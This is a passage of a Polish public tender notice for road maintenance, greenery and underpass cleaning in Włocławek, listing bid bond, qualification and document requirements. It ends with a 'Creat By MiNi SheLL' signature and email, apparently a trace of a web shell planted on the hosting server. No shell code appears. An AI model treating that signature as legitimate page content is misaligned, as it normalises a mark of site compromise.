    - zabezpieczenie miejsc niebezpiecznych (dziury, wymycia, wyrównanie rozjeżdżonych 
      poboczy itp )  i  powypadkowych  w koronie drogi;
    - po lub w czasie trwania burz połączonych z silnymi wiatrami - interwencyjne objazdy 
      drogi celem utrzymania  przejezdności - usuwanie gałęzi, wiatrołomów, uszkodzonego   
      drzewostanu;
    - wykonywanie innych robót wchodzących w zakres bieżącego utrzymania dróg;
    - Inne prace związane z wypadkami losowymi, jak: naprawa rozjeżdżonych poboczy, 
       usunięcie zanieczyszczenia jezdni spowodowanego przez pojazdy ze źle 
       zabezpieczonym ładunkiem.
3.  Ogólne wymagania dotyczące robót:
      Praca brygady polega na pracy wykonywanej w dni robocze oraz w dni wolne od  
      pracy, niedziele i święta. W ramach zamówienia przewidziano wykonywanie  robót      
      interwencyjnych związanych z bieżącym utrzymaniem dróg zlecanych na polecenie 
      Inspektora Nadzoru MZD.
      Roboty realizowane będą w oparciu o polecenia Zamawiającego. Lokalizacja oraz ilość   
      i rodzaj robót określona będzie przez Zamawiającego.  Zlecone roboty należy 
      rozpocząć niezwłocznie , o ile strony nie ustalą inaczej. Zgłoszenie dokonywane będzie  
      telefonicznie z późniejszym potwierdzeniem na piśmie.
      W przypadku interwencji (zgłoszenia) Wykonawca zobowiązany jest do podstawienia 
      samochodu wraz z pracownikami i sprzętem w ciągu 2 godzin od czasu wezwania, 
      miejsce podstawienia ustali Zamawiający.
      W ramach brygady interwencyjnej Wykonawca udostępni samochód dostawczy do 0,9 
      tony ładowności wraz z kierowcą i dwoma robotnikami.
4. Obmiar robót:
     Jednostką obmiarową pracy jest 1 godz.
     Na cenę jednostkową usługi składa się :
     - czas gotowości do podjęcia interwencji liczony od chwili powzięcia informacji o 
       zdarzeniu do podjęcia czynności ( max. do 2 godz. - w zależności od miejsca 
       zdarzenia )
     - czas pracy przy usuwaniu usterek.

XIV.	Zieleń drogowa, utrzymanie poboczy, rowów

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 333 do 
    345.
2. Zamówienie obejmuje następujące roboty podstawowe:
     - ścinanie drzew, frezowanie pieńków, cięcie gałęzi przy pomocy podnośnika z 
       wywozem poza teren robót z zagospodarowaniem przez Wykonawcę lub 
       odwiezieniem na składowisko, koszenie chwastów i jednorocznych samosiewów, 
       humusowanie z obsianiem, ścinanie poboczy, uzupełnianie poboczy pospółką, 
       czyszczenie rowów z profilowaniem skarp, ułożenie ścieków z elementów 
       prefabrykowanych;
     - sadzenie drzew lub krzewów z całkowitą zaprawą dołów z jednoroczną pielęgnacją w 
       okresie gwarancyjnym ( rozliczenie kosztów drzew lub krzewów nastąpi na podstawie  
       faktury za zakupiony materiał po określeniu przez zamawiającego gatunków roślin 
       przeznaczonych do nasadzeń;
     - wywóz dłużycy oraz urobku po ścinaniu poboczy w miejsce wskazane przez    
       Zamawiającego znajdujące się na terenie miasta Włocławek (transport do 20km);
     - wywóz pozostałości po czyszczeniu przepustów i rowów należy odwieść poza teren 
       robót z zagospodarowaniem przez Wykonawcę lub odwiezieniem na składowisko.
3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych   
    Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ

XV.	Utrzymanie czystości przejścia podziemnego

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 346 do 
    348.
2. Zamówienie obejmuje następujące roboty podstawowe:
     Utrzymanie czystości tunelu PKP - PKS na odcinku od wejścia z ul. Kościuszki 
    do ul. Węglowej łącznie z Pochylnią oraz placu przed wejściem do tunelu PKP od strony 
    ul. Węglowej
    Utrzymanie czystości polega na:
-	jednokrotnym w ciągu dnia zamiataniu powierzchni przejścia łącznie ze schodami, pochylnią i placem przed wejściem (powierzchnia placu 1700m2);
-	myciu raz w tygodniu posadzki, schodów i szyb w drzwiach (koszty poboru wody ponosi wykonawca);
-	omiataniu raz w miesiącu ścian i sufitów;
-	konserwacji oświetlenia (wymiana przepalonych świetlówek - koszty zakupu ponosi wykonawca);
-	konserwacja oświetlenia na placu wejście od strony ul. Węglowej - słupy 2 szt (wymiana przepalonych żarówek - koszty zakupu ponosi wykonawca);
-	wywóz nieczystości z koszy i utylizacja;
-	oczyszczaniu w okresie zimowym placu, schodów i pochylni z lodu i śniegu oraz posypywanie piaskiem i solą w celu likwidacji śliskości;
-	Udrażnianiu cieków przyściennych dla prawidłowego odprowadzania wód;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6, 45.23.32.90-8, 45.23.32.94-6, 90.47.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości  65 000,00 zł. 
Wadium może być wniesione w:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z roku 2007 Nr 42, poz.275, z późn, zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje w tym zakresie żadnych wymagań, ktorych spelnienie Wykonawca zobowiązany jest wykazać w sposób szczegolny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonać w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
1) jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania utrzymania dróg gruntowych na drogach publicznych o wartości nie mniejszej niż 400 000,00 zł brutto.
2)  jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania nawierzchni chodników na drogach publicznych o wartości nie mniejszej niż 2 000 000,00 zł brutto.
3) jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania podbudów na drogach publicznych o wartości nie mniejszej niż 2 000 000,00 zł brutto.
4) jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania nawierzchni z mieszanek mineralno - bitumicznych na drogach publicznych o wartości nie mniejszej niż  4 000 000,00 zł brutto.
5) jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania budowy, remontu, utrzymania sieci kanalizacji deszczowej na drogach publicznych o wartości nie mniejszej niż 500 000,00 zł brutto.
6) jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania remontu nawierzchni bitumicznych mieszankami mineralno - bitumicznymi na gorąco na drogach publicznych o wartości nie mniejszej niż 
2 000 000,00 zł brutto.
7) jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania remontu nawierzchni bitumicznych grysami i emulsją asfaltową na drogach publicznych o wartości nie mniejszej niż 800 000,00 zł brutto.
8) jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania remontu i konserwacji sygnalizacji świetlnej o wartości nie mniejszej niż 500 000,00 zł brutto.
9) jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania poziomego oznakowania dróg publicznych o wartości nie mniejszej niż 80 000,00 zł brutto.
10) jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania oznakowania pionowego w terenie miejskim o wartości nie mniejszej niż 10 000,00 zł brutto.
11) jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia w postaci wykonania remontów obiektów mostowych o wartości nie mniejszej niż 1 000 000,00 zł brutto.

Uwaga; 
Zamawiający dopuszcza, że w ramach jednego zadania mogą być wykonane roboty wymienione w pkt.1 -11 pod warunkiem, że dana robota będzie opiewała na daną kwotę i przedmiotem odpowiadała warunkowi zamówienia.  

Na potwierdzenie powyższego należy załączyć dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

wykazać w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, wykonać, a w przypadku świadczeń okresowych lub ciągłych wykonywać, co najmniej: 

1) jedno zadanie odpowiadające swoim rodzajem stanowiącym przedmiot zamówienia w postaci wykonania projektów organizacji ruchu o wartości nie  mniejszej niż 100 000,00 zł brutto.
2) jedno zadanie odpowiadające swoim rodzajem stanowiącym przedmiot zamówienia w postaci wykonania szaty roślinnej w terenie miejskim o wartości nie mniejszej niż 200 000,00 zł brutto.

Na potwierdzenie powyższego należy załączyć dokument potwierdzający, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje w tym zakresie żadnych wymagań, ktorych spelnienie Wykonawca zobowiązany jest wykazać w sposób szczegolny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać się osobami oraz informacjami o podstawie do dysponowania tymi osobami, które będą uczestniczyć w wykonywaniu zamówienia:
Minimum po jednej osobie odpowiedzialnej za kierowanie robotami budowlanym (zgodnie z dyspozycją art. 12 ustawy - Prawo budowlane z dnia 7 lipca 1994 r. tekst jednolity Dz. U. z 2006r. nr 156, poz. 1118, z późn. zm) do obsadzenia stanowisk:
a)	Kierownik robót z uprawnieniami budowlanymi do kierowania robotami w  specjalności drogowej lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, min. 3 lata doświadczenia w branży drogowej na stanowisku Kierownika budowy lub Kierownika robót, 
b)	Kierownik robót z uprawnieniami budowlanymi do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych, min. 3 lata doświadczenia w branży elektrycznej na  stanowisku kierownika budowy lub kierownika robót
                  oraz 
            c)   osoba do pełnienia funkcji kierowania ruchem minimalna liczba   
osób: 3
            d)   osoba do pełnienie funkcji serwisanta systemów sterowania ruchem:
                   minimalna liczba osób: 1, osoba wyznaczona musi posiadać autoryzacje  
                        serwisowe producentów systemów sterowania ruchem drogowym, które  
                        gwarantują niezawodne serwisowanie urządzeń sterujących sygnalizacjami  
                        świetlnymi we Włocławku.
                         Wymagane autoryzacje serwisowe od producentów:
1. GENEO , GENEO - VISION i MILLENIUM MINI  firmy TECHVISION,
                              2. AUTOSCOPE firmy Image Sensing Systems Europe Limited sp. z o.o.,
                        3. RW- ELEKTRONIK
Są to systemy sterowania ruchem Zamawiającego.

Na potwierdzenie powyższego należy załączyć oświadczenie, że osoby wymienione w pkt. a) i b) które będzie uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać przychód ze sprzedaży towarów i usług za ostatnie 3 lata obrotowe w wysokości nie mniejszej niż 10.000.000,00 złotych,

posiadać opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że  wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 3 000 000,00zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy załącznik nr 1 i załącznik nr 1A, pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono z odrębnych dokumentów, np.: z odpisu z rejestru</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie postanowienia, które zostaną wprowadzone do treści umowy oraz wysokość kar umownych z tytułu niewykonania lub nienależytego wykonania umowy zawarte są we wzorze umowy stanowiącym załącznik do niniejszej specyfikacji istotnych warunków. 
2.	Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku
do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:

1)	udzielenia w trakcie realizacji umowy zamówień dodatkowych, związanych 
z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia),
2)	przedłużenia terminu zakończenia realizacji przedmiotu umowy, mogącego nastąpić w przypadkach:
a) wystąpienia niekorzystnych warunków atmosferycznych powodujących wstrzymanie wykonania umowy w okresie dłuższym niż 7 dni kalendarzowych - potwierdzone pisemnie przez zamawiającego, przy czym przesunięcie terminu robót nastąpi o tyle dni, o ile trwało ich wstrzymanie,
b) wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiły po dniu wejścia w życie umowy, 
w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej,
c) pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego lub wydania zakazu prowadzenia prac przez organ  administracji publicznej o ile żądanie lub wydanie zakazów nie nastąpiło 
z przyczyn, za które Wykonawca ponosi odpowiedzialność,
d) wydania Wykonawcy polecenia, skutkującego koniecznością wydłużenia terminu zakończenia realizacji przedmiotu umowy, a w szczególności wydania Wykonawcy polecenia wstrzymania robót w związku z koniecznością ich skoordynowania z robotami realizowanymi przez gestorów sieci na terenie budowy lub innymi robotami realizowanymi w bezpośrednim sąsiedztwie terenu budowy na rzecz Zamawiającego;
	      3)   skrócenia terminu wykonania robót przewidzianych w umowie w przypadku   
                        wyczerpania środków finansowych przewidzianych na realizację zamówienia,
	      4)   zmiany stawki podatku VAT,
	      5)   zmiany przedstawicieli stron,

3.	Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej 
i podpisania przez obie strony.
4.	Wszelkie zmiany do umowy mogą być wprowadzone w okolicznościach i na zasadach  jak powyżej wyłącznie przed zakończeniem terminu realizacji umowy.
5.	Z wnioskiem o zmianę treści umowy może wystąpić zarówno Wykonawca, jak
i Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdwloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Włoclawek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2012 godzina 10:00, miejsce: Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Włoclawek, pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com